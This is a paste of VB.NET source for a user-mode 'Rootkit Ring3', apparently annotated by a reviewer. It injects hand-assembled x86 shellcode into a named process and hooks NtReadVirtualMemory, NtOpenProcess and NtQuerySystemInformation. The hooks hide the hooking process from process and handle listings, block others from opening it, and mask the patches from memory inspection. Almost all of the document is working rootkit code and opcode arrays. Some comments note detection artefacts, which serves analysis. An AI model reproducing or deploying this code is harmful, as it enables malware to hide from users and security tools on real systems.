rakanturki12222

Rootkit Ring3 --> MrZer0

Jul 29th, 2015
Module VbRootkit

    '*****************
    'Creator Menalix
    'Site: Menalix.com
    '*****************

    ' What this module does (as written): from a separate console process it
    ' opens a target process by name, copies a block of variables plus three
    ' hand-assembled x86 routines into a freshly allocated RWX region there,
    ' and overwrites the first five bytes of three ntdll exports in the target
    ' (NtReadVirtualMemory, NtOpenProcess, NtQuerySystemInformation) with a
    ' relative JMP into that region. Every address is a 32-bit UInteger and the
    ' PE walk uses PE32 offsets, so only a 32-bit target is handled.
    ' NOTE(review): the artefacts this leaves in the target are a private
    ' PAGE_EXECUTE_READWRITE/PAGE_EXECUTE allocation and an &HE9 byte at the
    ' entry of those three ntdll exports; comparing in-memory export prologues
    ' against the on-disk ntdll image surfaces both. No call below checks its
    ' return value, so any failure (target not found, access denied, allocation
    ' failure) either throws from the managed side or proceeds with zeroes.

#Region "WinAPI's"

    ' kernel32 entry points for the cross-process work. Handles are IntPtr;
    ' sizes, protections and addresses passed to the remote side are UInteger.
    Private Declare Function CloseHandle Lib "kernel32" (ByVal pHandle As IntPtr) As Boolean
    Private Declare Function OpenProcess Lib "kernel32" (ByVal dwDesiredAccess As Integer, ByVal bInheritHandle As Boolean, ByVal dwProcessId As UInteger) As IntPtr
    Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, <Runtime.InteropServices.Out()> ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesRead As UInteger) As Boolean
    Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal lpBuffer As Byte(), ByVal nSize As UInteger, ByRef lpNumberOfBytesWritten As UInteger) As Boolean
    Private Declare Function VirtualProtectEx Lib "kernel32" (ByVal hProcess As IntPtr, ByVal lpAddress As IntPtr, ByVal dwSize As UInteger, ByVal flNewProtect As UInteger, ByRef lpflOldProtect As UInteger) As Boolean

    ' Toolhelp module enumeration, used only to find module base addresses.
    Private Declare Function Module32Next Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean
    Private Declare Function Module32First Lib "kernel32" (ByVal hSnapshot As IntPtr, ByRef lpme As MODULEENTRY32) As Boolean
    Private Declare Function CreateToolhelp32Snapshot Lib "kernel32" (ByVal dwFlags As UInteger, ByVal u32ProcessId As UInteger) As IntPtr

    Private Declare Function VirtualAllocEx Lib "kernel32" ( _
    ByVal hProcess As IntPtr, _
    ByVal lpAddress As IntPtr, _
    ByVal dwSize As UInteger, _
    ByVal flAllocationType As UInteger, _
    ByVal flProtect As UInteger) As IntPtr

#End Region

#Region "Structures"

    ' Managed mirror of the Win32 MODULEENTRY32 consumed by Module32First/Next.
    ' U32Size must hold the marshalled size before the first call (set in
    ' GetModuleBaseAddress). SzModule/SzeExePath are fixed-size ANSI strings
    ' (256 and 260 characters) so the layout matches the native struct.
    Structure MODULEENTRY32
        Dim U32Size As UInteger
        Dim Th32ModuleId As UInteger
        Dim Th32ProcessId As UInteger
        Dim GlblcntUsage As UInteger
        Dim ProccntUsage As UInteger
        Dim ModBaseAddr As IntPtr
        Dim ModBaseSize As UInteger
        Dim HModule As IntPtr
        <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValTStr, SizeConst:=256)> Dim SzModule As String
        <Runtime.InteropServices.MarshalAs(Runtime.InteropServices.UnmanagedType.ByValTStr, SizeConst:=260)> Dim SzeExePath As String
    End Structure

#End Region


    ' Console driver. "Process Name" is a placeholder; HookApplication resolves
    ' it with Process.GetProcessesByName(...)(0), which throws
    ' IndexOutOfRangeException when no such process is running.
    Sub Main()
        Console.Title = "Hook Test Application"
        Console.WriteLine("Press enter, and the hook will be done!")
        Console.ReadLine()
        HookApplication("Process Name")
        Console.ReadLine()
    End Sub

    ' Reads nSize bytes at lpBaseAddress in hProcess and returns them as a new
    ' array. The ReadProcessMemory result and byte count are discarded, so on a
    ' failed or short read the caller receives a zero-filled (or partially
    ' filled) buffer with no error indication. nSize = 0 overflows the
    ' "nSize - 1" bound computation (VB integer overflow checking).
    Private Function ReadMemoryByte(ByVal hProcess As IntPtr, ByVal lpBaseAddress As IntPtr, ByVal nSize As UInteger) As Byte()

        Dim Buffer(CInt(nSize - 1)) As Byte
        ReadProcessMemory(hProcess, lpBaseAddress, Buffer, nSize, Nothing)
        Return Buffer

    End Function

    ' Resolves an export by name by walking the PE export directory of a module
    ' mapped in the remote process (no LoadLibrary/GetProcAddress in the
    ' target). Offsets used are those of a PE32 image: e_lfanew at +&H3C,
    ' export DataDirectory RVA at PE header +&H78, and within the 40-byte
    ' IMAGE_EXPORT_DIRECTORY NumberOfNames at 24, AddressOfFunctions at 28,
    ' AddressOfNames at 32, AddressOfNameOrdinals at 36. Name comparison is
    ' case-insensitive. Returns the absolute address, or 0 (Nothing) when the
    ' export is not found. Forwarded exports are not detected; a name longer
    ' than 64 bytes is read without a terminator guarantee; the ordinal is read
    ' with ToInt16, so an ordinal >= 32768 would be sign-extended (hedged:
    ' depends on Option Strict settings of the project).
    Private Function RemoteGetProcAddressManual(ByVal hProcess As IntPtr, ByVal ModuleAddress As UInteger, ByVal Export As String) As UInteger

        'PE Header relative declarations
        Dim PEHeaderOffset As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + &H3C, IntPtr), 4), 0)
        Dim ExportRVA As UInteger = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(ModuleAddress + PEHeaderOffset + &H78, IntPtr), 4), 0)
        Dim IExportDir() As Byte = ReadMemoryByte(hProcess, CType(ModuleAddress + ExportRVA, IntPtr), 40)
        Dim NamesCnt As Integer = BitConverter.ToInt32(IExportDir, 24)
        Dim Names As UInteger = BitConverter.ToUInt32(IExportDir, 32) + ModuleAddress
        Dim FuncAddress As UInteger = BitConverter.ToUInt32(IExportDir, 28) + ModuleAddress
        Dim Ordinals As UInteger = BitConverter.ToUInt32(IExportDir, 36) + ModuleAddress

        'Empty declarations to use later
        Dim tpAddress, ApiAddress, Ord As UInteger
        Dim ApiString As String = Nothing
        ' 64-byte scratch buffer for the ANSI export name; freed on every exit path.
        Dim Ptr As IntPtr = Runtime.InteropServices.Marshal.AllocHGlobal(64)

        'Searching for the Export
        For i = 1 To NamesCnt
            ' Name RVA i-1 -> name string -> ordinal i-1 -> function RVA at that ordinal.
            tpAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(Names + ((i - 1) * 4), IntPtr), 4), 0)
            Runtime.InteropServices.Marshal.Copy(ReadMemoryByte(hProcess, CType(ModuleAddress + tpAddress, IntPtr), 64), 0, Ptr, 64)
            ApiString = Runtime.InteropServices.Marshal.PtrToStringAnsi(Ptr)
            Ord = BitConverter.ToInt16(ReadMemoryByte(hProcess, CType(Ordinals + ((i - 1) * 2), IntPtr), 2), 0)
            ApiAddress = BitConverter.ToUInt32(ReadMemoryByte(hProcess, CType(FuncAddress + (Ord * 4), IntPtr), 4), 0) + ModuleAddress

            If String.Compare(ApiString, Export, True) = 0 Then
                Runtime.InteropServices.Marshal.FreeHGlobal(Ptr)
                Return ApiAddress
            End If

        Next

        Runtime.InteropServices.Marshal.FreeHGlobal(Ptr)
        Return Nothing

    End Function

    ' Returns the base address of strModule (case-insensitive) in the first
    ' process named strProcess, or 0 when not found. &H18 is
    ' TH32CS_SNAPMODULE Or TH32CS_SNAPMODULE32. Modules based above &H7FFFFFFF
    ' are skipped so the result always fits the 32-bit UInteger callers use.
    ' Known gaps: the snapshot handle is never closed (leaks one handle per
    ' call); the "= Nothing" test compares against 0, whereas per the Win32
    ' documentation CreateToolhelp32Snapshot reports failure with
    ' INVALID_HANDLE_VALUE (-1), so a failed snapshot is not caught here.
    Private Function GetModuleBaseAddress(ByVal strProcess As String, ByVal strModule As String) As IntPtr
        Dim hSnapshot As IntPtr = CreateToolhelp32Snapshot(&H18, CUInt(Diagnostics.Process.GetProcessesByName(strProcess)(0).Id))
        If hSnapshot = Nothing Then Return Nothing
        Dim me32Modules As New MODULEENTRY32
        me32Modules.U32Size = CUInt(Runtime.InteropServices.Marshal.SizeOf(me32Modules))
        If Module32First(hSnapshot, me32Modules) Then
            Do
                If Not me32Modules.ModBaseAddr.ToInt64 > &H7FFFFFFF Then
                    If String.Compare(strModule, me32Modules.SzModule, True) = 0 Then Return me32Modules.ModBaseAddr
                Else
                    ' 64-bit module base: intentionally ignored.
                End If
            Loop While (Module32Next(hSnapshot, me32Modules))
        End If
        Return Nothing
    End Function

    ' rel32 displacement for a 5-byte E9 JMP placed at SrcAddress that lands on
    ' DesAddress: the displacement is relative to the end of the instruction.
    Private Function CalculateOffset(ByVal DesAddress As Integer, ByVal SrcAddress As Integer) As Integer
        Return (DesAddress - SrcAddress) - 5
    End Function

    ' Installs the three hooks in the first process named ProcessName.
    ' Layout of the Variables block written at MemoryBlockPtr (offsets in bytes):
    '   0  address of kernel32!GetProcessId        (in the target)
    '   4  address of kernel32!GetCurrentProcessId (in the target)
    '   8  process id of THIS (hooking) process
    '  12  original address of ntdll!NtReadVirtualMemory
    '  16  original address of ntdll!NtOpenProcess
    '  20  original address of ntdll!NtQuerySystemInformation
    '  24  first 24 bytes of NtReadVirtualMemory, as they were before hooking
    '  48  first 24 bytes of NtOpenProcess
    '  72  first 24 bytes of NtQuerySystemInformation
    ' The three routines from the AsmOpCode region follow at
    ' MemoryBlockPtr + VariablesSize, back to back, in that order, and each
    ' hooked export gets a JMP to its routine.
    Sub HookApplication(ByVal ProcessName As String)
        Const VariablesSize As Integer = 96
        Dim ProcessHandle As IntPtr
        Dim MemoryBlockPtr As UInteger
        ' VB upper-bound syntax: this is 97 elements; only VariablesSize are written.
        Dim Variables() As Byte = New Byte(VariablesSize) {}
        Dim fpGetProcessId As UInteger
        Dim fpGetCurrentProcessId As UInteger
        ' Four slots declared, three used (indices 0..2).
        Dim lpProtectedAddress(3) As UInteger
        Dim ProtectedBuffer(3)() As Byte
        Dim OldProtect As UInteger = Nothing
        Dim WriteOffset As UInteger = Nothing
        ' &HE9 = JMP rel32; the four displacement bytes are filled per hook below.
        Dim JmpOpCode() As Byte = {&HE9, Nothing, Nothing, Nothing, Nothing}
        Dim OpCodes()() As Byte = {NtReadVirtualMemory_AsmOpCode, NtOpenProcess_AsmOpCode, NtQuerySystemInformation_AsmOpCode}
        Dim OpCodesSize As UInteger = OpCodes(0).Length + OpCodes(1).Length + OpCodes(2).Length

        'Alloc memory for our opcode and variables
        ' &H8+&H10+&H20 = PROCESS_VM_OPERATION Or PROCESS_VM_READ Or PROCESS_VM_WRITE.
        ' &H3000 = MEM_COMMIT Or MEM_RESERVE; &H40 = PAGE_EXECUTE_READWRITE.
        ' The IntPtr result is narrowed to 32 bits via CInt; a failed allocation (0) is not checked.
        ProcessHandle = OpenProcess(&H8 + &H10 + &H20, False, CUInt(Diagnostics.Process.GetProcessesByName(ProcessName)(0).Id))
        MemoryBlockPtr = CInt(VirtualAllocEx(ProcessHandle, Nothing, OpCodesSize + VariablesSize, &H3000, &H40))

        'Fill-in variables
        ' Each export is resolved by walking the PE export table of the target's
        ' own kernel32/ntdll mapping; a lookup miss yields 0 and is not checked.
        fpGetProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetProcessId"))
        fpGetCurrentProcessId = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "kernel32.dll")), "GetCurrentProcessId"))
        lpProtectedAddress(0) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtReadVirtualMemory"))
        lpProtectedAddress(1) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtOpenProcess"))
        lpProtectedAddress(2) = CInt(RemoteGetProcAddressManual(ProcessHandle, CInt(GetModuleBaseAddress(ProcessName, "ntdll.dll")), "NtQuerySystemInformation"))
        ' Snapshot the original prologues before they are overwritten; the
        ' trampolines call these copies to reach the real system call.
        ProtectedBuffer(0) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), 24)
        ProtectedBuffer(1) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), 24)
        ProtectedBuffer(2) = ReadMemoryByte(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), 24)
        BitConverter.GetBytes(fpGetProcessId).CopyTo(Variables, 0)
        BitConverter.GetBytes(fpGetCurrentProcessId).CopyTo(Variables, 4)
        BitConverter.GetBytes(Diagnostics.Process.GetCurrentProcess.Id).CopyTo(Variables, 8)
        BitConverter.GetBytes(lpProtectedAddress(0)).CopyTo(Variables, 12)
        BitConverter.GetBytes(lpProtectedAddress(1)).CopyTo(Variables, 16)
        BitConverter.GetBytes(lpProtectedAddress(2)).CopyTo(Variables, 20)
        ProtectedBuffer(0).CopyTo(Variables, 24)
        ProtectedBuffer(1).CopyTo(Variables, 24 + 24)
        ProtectedBuffer(2).CopyTo(Variables, 24 + 24 + 24)

        'Write variables and opcode to memory block
        ' Variables first, then the three routines contiguously.
        WriteOffset = MemoryBlockPtr
        WriteProcessMemory(ProcessHandle, WriteOffset, Variables, VariablesSize, Nothing)
        WriteOffset += VariablesSize
        For i = 0 To OpCodes.Length - 1
            WriteProcessMemory(ProcessHandle, WriteOffset, OpCodes(i), CUInt(OpCodes(i).Length), Nothing)
            WriteOffset += OpCodes(i).Length
        Next

        'Set memory page to execute code
        ' &H10 = PAGE_EXECUTE on the whole block; the previous protection is
        ' passed as the literal 0 and therefore discarded.
        VirtualProtectEx(ProcessHandle, MemoryBlockPtr, OpCodesSize + VariablesSize, &H10, 0)

        'Hook ZwReadVirtualMemory
        ' Per hook: compute rel32 from the export to its routine, make the
        ' export writable (&H40), patch 5 bytes, restore the old protection.
        WriteOffset = MemoryBlockPtr + VariablesSize
        BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(0))).CopyTo(JmpOpCode, 1)
        VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
        WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
        VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(0), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)

        'Hook ZwOpenProcess
        WriteOffset += OpCodes(0).Length
        BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(1))).CopyTo(JmpOpCode, 1)
        VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
        WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
        VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(1), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)

        'Hook ZwQuerySystemInformation
        WriteOffset += OpCodes(1).Length
        BitConverter.GetBytes(CalculateOffset(WriteOffset, lpProtectedAddress(2))).CopyTo(JmpOpCode, 1)
        VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), &H40, OldProtect)
        WriteProcessMemory(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), JmpOpCode, CUInt(JmpOpCode.Length), Nothing)
        VirtualProtectEx(ProcessHandle, CType(lpProtectedAddress(2), IntPtr), CUInt(JmpOpCode.Length), OldProtect, 0)

        ' clean up
        ' Only the process handle is released; the remote allocation and the
        ' patched exports are left in place (there is no unhook routine).
        CloseHandle(ProcessHandle)

    End Sub

#Region "AsmOpCode"

    ' Position-independent 32-bit stdcall routines, one per hooked export.
    ' Common prologue in all three (decoded from the leading bytes):
    '   C7 45 xx 01 00 00 C0      default status = &HC0000001 (STATUS_UNSUCCESSFUL)
    '   E8 00 00 00 00 / 58       call next instruction; pop eax  -> current EIP
    '   25 00 F0 FF FF            and eax, &HFFFFF000 -> page base = Variables block
    ' so each routine finds the Variables block by rounding its own address down
    ' to the page; this only works because the block is page-allocated and the
    ' routines sit within its first page (hedged: inferred from the layout in
    ' HookApplication, not checked anywhere).

    ' Replacement for NtReadVirtualMemory (ret &H14 -> 5 arguments). Appears to:
    ' call the saved original (Variables+24), then, when the call succeeded and
    ' the read targets the caller's own process (GetProcessId(handle) equals
    ' GetCurrentProcessId, or handle = -1), overlay the saved original prologue
    ' bytes onto any part of the output buffer that overlaps the three hooked
    ' addresses - i.e. hides the patches from self-inspection. Decoding is
    ' best-effort from the opcode bytes; confirm in a disassembler.
    Private NtReadVirtualMemory_AsmOpCode As Byte() = { _
&H55, &H8B, &HEC, &H83, &HEC, &H14, &H56, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, _
&H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &HFF, &H75, &H18, &HFF, _
&H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, _
&H18, &HFF, &HD0, &H89, &H45, &HF8, &H83, &H7D, &HF8, &H0, &HF, &H8C, &HA8, &H0, &H0, &H0, _
&HFF, &H75, &H8, &H8B, &H45, &HFC, &HFF, &H10, &H8B, &HF0, &H8B, &H45, &HFC, &HFF, &H50, &H4, _
&H3B, &HF0, &H74, &HA, &H83, &H7D, &H8, &HFF, &HF, &H85, &H8A, &H0, &H0, &H0, &H83, &H65, _
&HF4, &H0, &HEB, &H7, &H8B, &H45, &HF4, &H40, &H89, &H45, &HF4, &H83, &H7D, &HF4, &H3, &H73, _
&H77, &H8B, &H45, &HF4, &H8B, &H4D, &HFC, &H83, &H7C, &H81, &HC, &H0, &H74, &H65, &H8B, &H45, _
&HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H3B, &H45, &HC, &H72, &H56, &H8B, &H45, &HC, _
&H3, &H45, &H14, &H8B, &H4D, &HF4, &H8B, &H55, &HFC, &H39, &H44, &H8A, &HC, &H73, &H44, &H8B, _
&H45, &HF4, &H8B, &H4D, &HFC, &H8B, &H44, &H81, &HC, &H2B, &H45, &HC, &H89, &H45, &HF0, &H83, _
&H65, &HEC, &H0, &HEB, &H7, &H8B, &H45, &HEC, &H40, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H18, _
&H73, &H21, &H8B, &H45, &HF4, &H6B, &HC0, &H18, &H8B, &H4D, &HFC, &H8D, &H44, &H1, &H18, &H8B, _
&H4D, &HEC, &H3, &H4D, &HF0, &H8B, &H55, &H10, &H8B, &H75, &HEC, &H8A, &H4, &H30, &H88, &H4, _
&HA, &HEB, &HD2, &HE9, &H7C, &HFF, &HFF, &HFF, &H8B, &H45, &HF8, &H5E, &HC9, &HC2, &H14, &H0}

    ' Replacement for NtOpenProcess (ret &H10 -> 4 arguments). Appears to
    ' compare ClientId->UniqueProcess against the hooking process id at
    ' Variables+8 and return &HC0000022 (STATUS_ACCESS_DENIED) on a match;
    ' otherwise it forwards to the saved original at Variables+48.
    Private NtOpenProcess_AsmOpCode As Byte() = { _
&H55, &H8B, &HEC, &H51, &H51, &HC7, &H45, &HF8, &H1, &H0, &H0, &HC0, &HE8, &H0, &H0, &H0, _
&H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HFC, &H83, &H7D, &H14, &H0, &H74, &H16, _
&H8B, &H45, &H14, &H8B, &H4D, &HFC, &H8B, &H0, &H3B, &H41, &H8, &H75, &H9, &HC7, &H45, &HF8, _
&H22, &H0, &H0, &HC0, &HEB, &H17, &HFF, &H75, &H14, &HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, _
&H75, &H8, &H8B, &H45, &HFC, &H83, &HC0, &H30, &HFF, &HD0, &H89, &H45, &HF8, &H8B, &H45, &HF8, _
&HC9, &HC2, &H10, &H0}

    ' Replacement for NtQuerySystemInformation (ret &H10 -> 4 arguments).
    ' Forwards to the saved original at Variables+72, then on success filters
    ' the result: for class 5 (SystemProcessInformation, "cmp [ebp+8],5") it
    ' appears to unlink list entries whose process id (+&H44) equals
    ' Variables+8; for class &H10 (SystemHandleInformation) it appears to
    ' remove 16-byte handle entries owned by that process id, shifting the
    ' remainder down and decrementing the count. Best-effort decoding; the
    ' structure offsets assumed here are those of 32-bit Windows of the
    ' 2015 era and are not validated by the code.
    Private NtQuerySystemInformation_AsmOpCode As Byte() = { _
&H55, &H8B, &HEC, &H83, &HEC, &H1C, &H56, &H57, &HC7, &H45, &HEC, &H1, &H0, &H0, &HC0, &HE8, _
&H0, &H0, &H0, &H0, &H58, &H25, &H0, &HF0, &HFF, &HFF, &H89, &H45, &HF0, &HFF, &H75, &H14, _
&HFF, &H75, &H10, &HFF, &H75, &HC, &HFF, &H75, &H8, &H8B, &H45, &HF0, &H83, &HC0, &H48, &HFF, _
&HD0, &H89, &H45, &HEC, &H83, &H7D, &HEC, &H0, &HF, &H8C, &H4E, &H1, &H0, &H0, &H83, &H7D, _
&H8, &H5, &H75, &H5D, &H83, &H65, &HF8, &H0, &H8B, &H45, &HC, &H89, &H45, &HF4, &H8B, &H45, _
&HF4, &H83, &H38, &H0, &H74, &H46, &H8B, &H45, &HF4, &H89, &H45, &HF8, &H8B, &H45, &HF8, &H8B, _
&H4D, &HF8, &H3, &H8, &H89, &H4D, &HF4, &H8B, &H45, &HF4, &H8B, &H4D, &HF0, &H8B, &H40, &H44, _
&H3B, &H41, &H8, &H75, &H25, &H8B, &H45, &HF4, &H83, &H38, &H0, &H75, &H8, &H8B, &H45, &HF8, _
&H83, &H20, &H0, &HEB, &HF, &H8B, &H45, &HF8, &H8B, &H0, &H8B, &H4D, &HF4, &H3, &H1, &H8B, _
&H4D, &HF8, &H89, &H1, &H8B, &H45, &HF8, &H89, &H45, &HF4, &HEB, &HB2, &HE9, &HEB, &H0, &H0, _
&H0, &H83, &H7D, &H8, &H10, &HF, &H85, &HE1, &H0, &H0, &H0, &H8B, &H45, &HC, &H89, &H45, _
&HFC, &H83, &H65, &HE8, &H0, &HEB, &H7, &H8B, &H45, &HE8, &H40, &H89, &H45, &HE8, &H8B, &H45, _
&HFC, &H8B, &H4D, &HE8, &H3B, &H8, &HF, &H83, &HC0, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, _
&HE0, &H4, &H8B, &H4D, &HFC, &H8B, &H55, &HF0, &H8B, &H44, &H1, &H4, &H3B, &H42, &H8, &HF, _
&H85, &HA2, &H0, &H0, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, _
&H1, &H9, &H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H10, _
&H0, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H33, &HC9, &H8B, &H55, &HFC, &H66, &H89, &H4C, &H2, _
&HA, &H8B, &H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &HC, &H0, &H8B, _
&H45, &HE8, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &HC6, &H44, &H1, &H8, &H0, &H8B, &H45, &HE8, _
&HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H83, &H64, &H1, &H4, &H0, &H8B, &H45, &HE8, &H89, &H45, _
&HE4, &HEB, &H7, &H8B, &H45, &HE4, &H40, &H89, &H45, &HE4, &H8B, &H45, &HFC, &H8B, &H4D, &HE4, _
&H3B, &H8, &H73, &H21, &H8B, &H45, &HE4, &H40, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H74, _
&H1, &H4, &H8B, &H45, &HE4, &HC1, &HE0, &H4, &H8B, &H4D, &HFC, &H8D, &H7C, &H1, &H4, &HA5, _
&HA5, &HA5, &HA5, &HEB, &HCE, &H8B, &H45, &HFC, &H8B, &H0, &H48, &H8B, &H4D, &HFC, &H89, &H1, _
&H8B, &H45, &HE8, &H48, &H89, &H45, &HE8, &HE9, &H2B, &HFF, &HFF, &HFF, &H8B, &H45, &HEC, &H5F, _
&H5E, &HC9, &HC2, &H10, &H0}

#End Region

End Module